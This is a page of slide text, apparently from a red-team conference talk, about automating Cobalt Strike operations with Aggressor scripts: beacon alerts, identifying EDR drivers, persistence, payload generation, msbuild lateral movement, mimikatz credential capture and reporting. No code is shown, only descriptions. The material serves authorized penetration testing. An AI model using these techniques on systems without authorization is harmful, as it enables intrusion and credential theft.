Passive Intelligence Gathering and Analytics - It's All Just Metadata!
Passive Intelligence Gathering and Analytics - It's All Just Metadata!Passive Intelligence Gathering and Analytics - It's All Just Metadata!
Passive Intelligence Gathering and Analytics - It's All Just Metadata!
CTruncer
 
Pen Testing, Red Teaming, and More
Pen Testing, Red Teaming, and MorePen Testing, Red Teaming, and More
Pen Testing, Red Teaming, and More
CTruncer
 
Hacking - Breaking Into It
Hacking - Breaking Into ItHacking - Breaking Into It
Hacking - Breaking Into It
CTruncer
 
An EyeWitness View into your Network
An EyeWitness View into your NetworkAn EyeWitness View into your Network
An EyeWitness View into your Network
CTruncer
 
What Goes In Must Come Out: Egress-Assess and Data Exfiltration
What Goes In Must Come Out: Egress-Assess and Data ExfiltrationWhat Goes In Must Come Out: Egress-Assess and Data Exfiltration
What Goes In Must Come Out: Egress-Assess and Data Exfiltration
CTruncer
 
Pen Testing Development
Pen Testing DevelopmentPen Testing Development
Pen Testing Development
CTruncer
 
Egress-Assess and Owning Data Exfiltration
Egress-Assess and Owning Data ExfiltrationEgress-Assess and Owning Data Exfiltration
Egress-Assess and Owning Data Exfiltration
CTruncer
 
Pentester++
Pentester++Pentester++
Pentester++
CTruncer
 
EyeWitness - A Web Application Triage Tool
EyeWitness - A Web Application Triage ToolEyeWitness - A Web Application Triage Tool
EyeWitness - A Web Application Triage Tool
CTruncer
 

More from CTruncer (15)

Windows 10 - Endpoint Security Improvements and the Implant Since Windows 2000
Windows 10 - Endpoint Security Improvements and the Implant Since Windows 2000Windows 10 - Endpoint Security Improvements and the Implant Since Windows 2000
Windows 10 - Endpoint Security Improvements and the Implant Since Windows 2000
 
AntiVirus Evasion Reconstructed - Veil 3.0
AntiVirus Evasion Reconstructed - Veil 3.0AntiVirus Evasion Reconstructed - Veil 3.0
AntiVirus Evasion Reconstructed - Veil 3.0
 
Bringing Down the House - How One Python Script Ruled Over AntiVirus
Bringing Down the House - How One Python Script Ruled Over AntiVirusBringing Down the House - How One Python Script Ruled Over AntiVirus
Bringing Down the House - How One Python Script Ruled Over AntiVirus
 
A Battle Against the Industry - Beating Antivirus for Meterpreter and More
A Battle Against the Industry - Beating Antivirus for Meterpreter and MoreA Battle Against the Industry - Beating Antivirus for Meterpreter and More
A Battle Against the Industry - Beating Antivirus for Meterpreter and More
 
The Art of AV Evasion - Or Lack Thereof
The Art of AV Evasion - Or Lack ThereofThe Art of AV Evasion - Or Lack Thereof
The Art of AV Evasion - Or Lack Thereof
 
Higher Level Malware
Higher Level MalwareHigher Level Malware
Higher Level Malware
 
Passive Intelligence Gathering and Analytics - It's All Just Metadata!
Passive Intelligence Gathering and Analytics - It's All Just Metadata!Passive Intelligence Gathering and Analytics - It's All Just Metadata!
Passive Intelligence Gathering and Analytics - It's All Just Metadata!
 
Pen Testing, Red Teaming, and More
Pen Testing, Red Teaming, and MorePen Testing, Red Teaming, and More
Pen Testing, Red Teaming, and More
 
Hacking - Breaking Into It
Hacking - Breaking Into ItHacking - Breaking Into It
Hacking - Breaking Into It
 
An EyeWitness View into your Network
An EyeWitness View into your NetworkAn EyeWitness View into your Network
An EyeWitness View into your Network
 
What Goes In Must Come Out: Egress-Assess and Data Exfiltration
What Goes In Must Come Out: Egress-Assess and Data ExfiltrationWhat Goes In Must Come Out: Egress-Assess and Data Exfiltration
What Goes In Must Come Out: Egress-Assess and Data Exfiltration
 
Pen Testing Development
Pen Testing DevelopmentPen Testing Development
Pen Testing Development
 
Egress-Assess and Owning Data Exfiltration
Egress-Assess and Owning Data ExfiltrationEgress-Assess and Owning Data Exfiltration
Egress-Assess and Owning Data Exfiltration
 
Pentester++
Pentester++Pentester++
Pentester++
 
EyeWitness - A Web Application Triage Tool
EyeWitness - A Web Application Triage ToolEyeWitness - A Web Application Triage Tool
EyeWitness - A Web Application Triage Tool
 

Recently uploaded

Enchancing adoption of Open Source Libraries. A case study on Albumentations.AI
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AIEnchancing adoption of Open Source Libraries. A case study on Albumentations.AI
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AI
Vladimir Iglovikov, Ph.D.
 
Mind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AIMind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AI
Kumud Singh
 
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
Neo4j
 
Monitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR EventsMonitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR Events
Ana-Maria Mihalceanu
 
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex Proofs
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex ProofszkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex Proofs
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex Proofs
Alex Pruden
 
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
SOFTTECHHUB
 
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Nexer Digital
 
Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
Kari Kakkonen
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
Alan Dix
 
UiPath Test Automation using UiPath Test Suite series, part 6
UiPath Test Automation using UiPath Test Suite series, part 6UiPath Test Automation using UiPath Test Suite series, part 6
UiPath Test Automation using UiPath Test Suite series, part 6
DianaGray10
 
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
Neo4j
 
UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5
DianaGray10
 
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Albert Hoitingh
 
20240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 202420240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 2024
Matthew Sinclair
 
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
Neo4j
 
Full-RAG: A modern architecture for hyper-personalization
Full-RAG: A modern architecture for hyper-personalizationFull-RAG: A modern architecture for hyper-personalization
Full-RAG: A modern architecture for hyper-personalization
Zilliz
 
GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...
ThomasParaiso2
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
DanBrown980551
 
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
James Anderson
 

Recently uploaded (20)

Enchancing adoption of Open Source Libraries. A case study on Albumentations.AI
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AIEnchancing adoption of Open Source Libraries. A case study on Albumentations.AI
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AI
 
Mind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AIMind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AI
 
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
 
Monitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR EventsMonitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR Events
 
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex Proofs
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex ProofszkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex Proofs
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex Proofs
 
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
 
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?
 
Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
 
UiPath Test Automation using UiPath Test Suite series, part 6
UiPath Test Automation using UiPath Test Suite series, part 6UiPath Test Automation using UiPath Test Suite series, part 6
UiPath Test Automation using UiPath Test Suite series, part 6
 
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
 
UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5
 
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
 
20240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 202420240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 2024
 
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
 
Full-RAG: A modern architecture for hyper-personalization
Full-RAG: A modern architecture for hyper-personalizationFull-RAG: A modern architecture for hyper-personalization
Full-RAG: A modern architecture for hyper-personalization
 
GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
 
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
 

Aggressive Autonomous Actions - Operating with Automation

  • 2. #whoami @ChrisTruncer ▸ Sys admin turned red teamer ▸ Florida State Seminole ▸ Co-Founder and Red Team Lead of FortyNorth Security ▸ Open Source Developer ▹ Veil-Framework ▹ WMImplant ▹ EyeWitness ▹ ...and more 2
  • 3. #whoami @r3dQu1nn ▸ Sys/Net Admin turned Red Teamer/Pen Tester ▸ Previous: ▹ IT in the Navy for 9 years ▹ Navy Red Team Technical Lead ▸ Current: ▹ Red Team Security Consultant for Mandiant ▹ PowerShell Reverse Engineer ▸ Glorified Script Kiddie/Noobie ▹ https://github.com/harleyQu1nn/AggressorScripts 3
  • 4. What’s This Talk About? ▸ Automation ▸ Aggressor ▹ Event driven language ▸ Events that we might care about ▸ Assessment/Attack lifecycle ▸ Where can automation help? ▸ Demos ▸ Links 4
  • 5. This is NOT About… ▸ Automating Red Teams ▸ Automating Pen Testing ▸ There’s something to be said about the human mind analyzing the problem ▹ What if an exploit fails once, but runs the second time? ▹ How does automation account for this? ▹ Can it always identify the root cause? ▸ This isn’t SKYNET for offensive work 5 https://ih1.redbubble.net/image.412212290.3664/flat,800x800,075,f.jpg
  • 7. Automation ▸ Automation is useful for tasks ▹ Tasks that don’t require interaction ▹ Doesn’t need human processing ▸ At some level, we’re lazy ▹ Why manually do something if we can automate it? ▸ Trivial tasks are prime candidates ▹ Don’t require intensive analysis, if any ▸ How long will you have that initial access? ▹ Do you have the right permissions to install persistence? ▹ Can you install persistence fast enough before the victim user logs off? ▹ Automation can help us accomplish these much faster 7
  • 8. Automation ▸ There are additional benefits beyond letting us sit and watch something do our job J ▸ Ensure a uniform process is always followed ▹ You can build out protection mechanisms that keep you from doing something ▸ Prevent user error ▹ Rather than fat fingering a parameter/command, automation can ensure you always run it correctly 8
  • 9. Automation ▸ How can red teams/or pen testers use automation on their tests ▹ Talk is cheap – what’s an easy way to implement? ▸ Open Source ▹ Metasploit resource scripts are a good option ▸ How do we do it? ▹ We’re a Cobalt Strike shop ▹ Scripts and code we reference/release will use Aggressor 9 https://www.cobaltstrike.com/images/art/hacker_small.png
  • 11. Aggressor – What is it? ▸ Aggressor is a scripting language built into Cobalt Strike ▹ Since version 3.0 ▸ It is based on the language Sleep ▸ Aggressor lets you automate operator actions, manipulate data, generate reports, etc. ▸ Aggressor isn’t a standard programming language ▹ It’s an event driven language 11 https://memegenerator.net/instance/52901150/buzz-lightyear-meme-fixd-scripts-scripts-everywhere
  • 12. Event Driven Language ▸ This doesn’t generate a compiled binary which you run on a computer ▸ Rather than “starting” a program, your code is triggered when a specific event is encountered ▹ Think similar to WMI events that occur after X happens ▹ Remember IRC Bots? ▸ Aggressor is driven by events that happen while it is running ▹ These are clearly related to actions that occurs while compromising a system 12
  • 13. Aggressor – The Core ▸ Aggressor is based on the language Sleep ▹ http://sleep.dashnine.org/manual/index.html ▸ Sleep is a “java-based scripting language heavily inspired by Perl” ▸ Aggressor is an additional set of exposed functions for extending Cobalt Strike and its associated functionality ▹ Extending can also mean creating automation for your requirements 13 https://www.amazon.com/gp/product/143822723X?ie=UTF8&tag=slejavscrlan- 20&linkCode=as2&camp=1789&creative=9325&creativeASIN=143822723X
  • 14. Aggressor – The Core ▸ Aggressor has the ability to interact with Cobalt Strike, Beacons, and data such as: ▹ Running commands within a Beacon, interpreting results, and making a decision ▹ Interacting with downloaded screenshots or keylogged data ▹ Modify sites hosted by Cobalt Strike ▹ Interact with credentials stored on your team server ▹ Develop custom reports for your customers, and more… 14
  • 16. Aggressor Scripting ▸ Aggressor scripting utilizes different functionality to enable its developers ▸ Events – Aggressor Events initiates and runs your code when a specific condition occurs ▸ Functions – Allow you to run “checks”, perform an action locally, or run a command within Beacon - this is the mechanism for performing an action ▸ Hooks – Can allow you to generate pop-up menus ▸ The Data Model – These are different data repositories that you can manipulate 16
  • 17. Aggressor Events ▸ There are triggerable events for almost everything you could wish with Aggressor ▸ beacon_initial – This monitors for new beacons checking in to your team server ▸ event_join – This event occurs when a new user connects to your team server ▸ heartbeat_* - This event occurs every X seconds or minutes ▸ ssh_initial – As new ssh connections check in, this event will fire 17
  • 18. Aggressor Events ▸ Remember how your DNS beacons first check in, but with no data? ▸ beacon_initial_empty – This event triggers when the team server receives an empty beacon ▸ One of the first things people may do is type “checkin” and/or set the “mode” ▹ Save yourself the step! 18 https://lh4.googleusercontent.com/TJdG-5- 4YzBK9MuoaiNqO5k1gaCRtBZ181KXNb1pvLZbWTj6N1Hi-T9GcHWuwOIQNpvekw0swJ0D- mTouZMb4h0mYyNe0GRFqRuF-SwfM42u7n5TPLi0cuwsENqPB4zVSa0ioprJ
  • 19. Aggressor Events ▸ Events expose access to different objects depending on the event ▹ beacon_initial – This will provide a handle into the individual beacon checking in ▹ This is how you can have an individual beacon perform an action ▹ Heartbeat_* - exposes nothing, but you can use a function to iterate over all beacons ▹ This provides you access to them 19
  • 20. Aggressor Events ▸ There are a large number of events that you can use to trigger your code ▸ Events are available here - https://www.cobaltstrike.com/aggressor- script/events.html ▸ You can’t create your own custom events ▹ This part isn’t user-expandable ▸ However, you can always ask if you can think of a useful trigger 20
  • 21. Aggressor Functions ▸ Functions are the “code” associated with your Aggressor Script ▸ Functions dictate the actions that you will perform once your trigger is activated ▸ Your code isn’t limited to what you see listed on the Aggressor function page ▸ Aggressor is based on Sleep, right? ▸ Your code will likely be a combination of Aggressor and Sleep 21
  • 22. Aggressor Functions ▸ Functions include essentially every action that you can conduct within Beacon ▹ bpowershell_import – Imports a PowerShell script within a beacon ▹ bps – Performs a process listing on the targeted beacon ▹ blogonpasswords – Runs the mimikatz logonpasswords command ▹ bls – Lists all files in a specific directory ▹ bsetenv – Sets an environmental variable on the current beacon 22
  • 23. Aggressor Functions ▸ It also includes “metafunctions” with interact and provide results based on Beacon metadata ▹ -is64 – This function will return true if the Beacon is running in a x64 process ▹ -isadmin – This returns true if the Beacon is running with admin rights ▹ -isssh – This returns true if the active session is a SSH session 23
  • 24. Aggressor Functions ▸ You also have the ability to interact with Cobalt Strike (rather than Beacon) and manipulate data through Aggressor ▹ gzip – Gzip a string ▹ Base64_decode – Base64 decode a string ▹ openfilebrowser – Opens the file browser interface for a beacon ▹ openScreenshotBrowser – Opens the screenshot tab ▹ str_encode – Encodes a string in the specified encoding format 24
  • 25. Aggressor Sample ▸ Let’s piece some of this together in a sample scenario ▸ You’ve compromised a Windows jump-box used by admins/users ▸ You were able to escalate privileges ▸ You’re interested in capturing passwords from users regularly logging in to the system ▸ How can Aggressor help? 25
  • 26. 26
  • 27. 27
  • 28. 28
  • 29. 29
  • 30. 30
  • 31. 31
  • 32. 32
  • 33. 33
  • 34. Applied Automation – A Phishing Tale What steps can leverage automation? 34
  • 35. A Phishing Tale ▸ What’s likely the most prevalent method of gaining access into an environment? ▸ Phishing! ▸ This is a time intensive process ▹ Generally requires developing a scenario for your customer ▹ Writing custom malware for your customer and scenario ▹ Developing domain reputation ▹ Etc. 35 http://2.bp.blogspot.com/_3zyldbmlRcQ/SFHr8lUkWpI/AAAAAAAAACg/KOLMVHuSY- g/s320/_40998639_net_phishingcartoon203.gif
  • 36. A Phishing Tale ▸ Eventually, you’ve fired your first salvo and have started phishing ▸ If you’re lucky, your first target opens your e-mail and runs your malware ▸ However, this isn’t always the case ▹ It might take a few people ▹ If you’re sending every 15-30 minutes, time adds up ▸ What if you go grab a drink, are watching a different screen, etc. ▹ Do you see your incoming Beacon? 36https://i.pinimg.com/736x/7a/23/fb/7a23fb0506b89f26b01734d6f2ca499d--cartoons.jpg
  • 37. A Phishing Tale ▸ One of the worst feelings can be coming back to your system and seeing you missed a callback ▸ It’s also great to know right when your Beacon arrives ▸ Aggressor can help ▹ Let’s look into the correct trigger ▹ There’s publicly available code that sends text messages via e-mail ▹ Sleep can let us run an existing script 37https://i.pinimg.com/736x/82/dc/f8/82dcf869638e2e912822cb51aafdc3bb--stupid-stuff-nerd-stuff.jpg
  • 38. 38
  • 39. 39
  • 40. 40
  • 41. 41
  • 42. 42
  • 43. 43
  • 44. 44
  • 45. 45
  • 46. 46
  • 47. 47
  • 49. Identifying EDR ▸ Now that we’ve been alerted to our beacon, we might want to recon it ▸ What sort of data are we interested in? ▹ Sky’s the limit ▹ Network Connections/Interfaces ▹ Mapped Drives ▹ Local Admin Rights ▹ Etc. ▸ What about end point protection software/defenses and its settings? 49
  • 50. Identifying EDR ▸ Most EDR products install minifilter drivers/.sys files ▸ Installed to %SystemRoot%System32drivers or %SystemRoot%System32DriverStoreFileRepository ▹ Minifilter altitudes are allocated by Microsoft and are publicly listed ▹ https://docs.microsoft.com/en-us/windows- hardware/drivers/ifs/allocated-altitudes ▹ This document associates minifilter drivers with vendor names 50
  • 51. Identifying EDR ▸ Why is this important and how can we use this? ▹ If the EDR product is not using the cloud based option we can identify the minifilter driver and match it to the company name ▹ This process can be automated using Aggressor ▹ Gives Red Teamers awareness of what they are up against before executing commands ▸ How can this be automated? ▹ Cobalt Strike's Beacon has a built-in 'ls' command we can use ▹ This built-in 'ls' command uses Win32 API's to list a directory (more stealthy than using dir or powershell) 51
  • 52. Identifying EDR ▸ Does the built-in 'ls' command have documentation?? ▹ https://www.cobaltstrike.com/aggressor- script/functions.html#bls 52
  • 53. Identifying EDR ▸ List out the driver directories and parse the results with conditional statements to determine what EDR is present ▹ Define a static array of .sys files ▹ Store the 'ls' command results in an array ▹ Parse the results array and do exact matching to determine the proper vendor information ▹ Profit ▸ We can also identify other AV products and Admin Tools present using the 'ps' built-in beacon command and matching on the process name 53
  • 58. 58
  • 59. 59
  • 60. Applied Automation – Persistence What steps can leverage automation? 60
  • 61. Persisting ▸ We’ve found minimal EDR software, or exclusions which we can exploit to maintain access ▸ Persistence might be the next step we want to take (depending on previous results) ▸ Automating persistence is something we hesitate on doing ▸ Let’s have this be a combination of manual analysis and Aggressor 61
  • 62. Persisting ▸ There’s a couple different ways to persist depending on the level of access ▹ Registry Key ▹ Scheduled Task ▹ WMI Persistence ▸ Rather than doing this all from the command line, let’s generate a pop-up for ease of use! 62
  • 63. 63
  • 64. 64
  • 65. 65
  • 66. 66
  • 67. 67
  • 68. 68
  • 69. 69
  • 70. 70
  • 71.
  • 72.
  • 73.
  • 74.
  • 75.
  • 76. 76
  • 77. 77
  • 79. Generating Payloads ▸ Payload generation is another crucial step in Red Team engagements and are used for many different reasons ▹ Initial Access ▹ Lateral Movement ▹ Persistence ▹ Obfuscation/Encoding/AWL Bypass ▸ Beneficial for Blue Team as well! ▹ Signature based identifiers/IOCs ▹ Test detection capabilities ▹ Payload sizes/types 79
  • 80. Generating Payloads ▸ What types of payloads can we generate? ▹ HTTP ▹ HTTPS ▹ SMB ▹ DNS ▸ How do they work and how are they generated? ▹ Staged vs Stageless (S) ▹ Based off listener information, malleable profile, architecture selection (x64/x86) ▹ Attacks -> Packages menu options 80
  • 81. Generating Payloads ▸ How can we automate payload generation using Aggressor? ▹ Utilize dialog API with drow_listener ▹ artifact/artifact_stageless functions 81 https://www.cobaltstrike.com/aggressor-script/functions.html#dialog
  • 84. 84
  • 85. 85
  • 86. 86
  • 88. Lateral Movement ▸ Lateral movement is a vital part of every engagement and can be approached in different ways ▹ What value can we add if we show successful pivoting inside a network? ▹ 9 times out of 10 we need to move laterally to accomplish our objectives ▸ Can we automate this methodology? ▹ How can we use Aggressor Scripts to enhance lateral movement? 88
  • 89. Lateral Movement ▸ Built-in methods of lateral movement inside of beacon ▹ wmi ▹ psexec/psexec_psh ▹ winrm ▸ All of these methods invoke a PowerShell one-liner based on the listener selection ▹ Good for quick and easy lateral movement ▹ Bad for staying stealthy and avoiding the use of PowerShell/PsExec 89
  • 90. Lateral Movement ▸ Let's use Aggressor to build out a newer technique of Lateral Movement ▸ Focus on using unmanaged powershell with msbuild ▸ Set global variables to help generate the xml file ▸ Functions that we need to utilize: ▹ alias ▹ beacon_command_register ▹ bupload_raw ▹ bpowerpick ▹ exec 90
  • 92. Lateral Movement ▸ Building out our alias commands with beacon_command_register ▹ remote_msbuild_script ▹ remote_msbuild_cmd 92
  • 99. Lateral Movement ▸ Let's run through the other alias command (remote_msbuild_cmd) and use similar code with minor differences 99
  • 102. 102
  • 104. Reporting ▸ Reporting is part of every assessment and it should be done right ▹ What value are we if we can hack our customers but can’t convey what we did, risk remediations, etc? ▸ There are steps you can take to make reporting more efficient ▹ Develop approved finding language ▹ Develop reporting templates ▹ Automate generating commonly requested information 104
  • 105. Reporting ▸ Let’s tackle that last bullet point ▹ Automate generating commonly requested information ▸ What’s something that our customers ALWAYS ask? ▹ What computers were compromised? ▹ What accounts were compromised? ▸ Let’s create a report generating function which captures this information! 105 https://vignette.wikia.nocookie.net/cryptidz/images/c/c6/Why_Not_Zoidberg.jpg/revision/latest?cb =20160219063637
  • 106. 106
  • 107. 107
  • 108. 108
  • 109. Where to get this? ▸ We just covered a lot of different code ▸ Aggregate everything within a central repo ▹ This is not all our code ▹ It’s some of the scripts we use the most in one area ▸ https://github.com/FortyNorthSecurity/Aggressor Assessor ▹ Get all of the code here! 109
  • 110. ▸ Aggregate everything within a central repo ▹ This is not all our code ▹ It’s some of the scripts we use the most in one area ▸ https://github.com/FortyNorthSecurity/AggressorAsses sor ▹ Get all of the code here! @ChrisTruncer ▹ https://www.fortynorthsecurity.com @ r3dQu1nn ▹ https://github.com/harleyQu1nn/AggressorScripts 110 Thanks!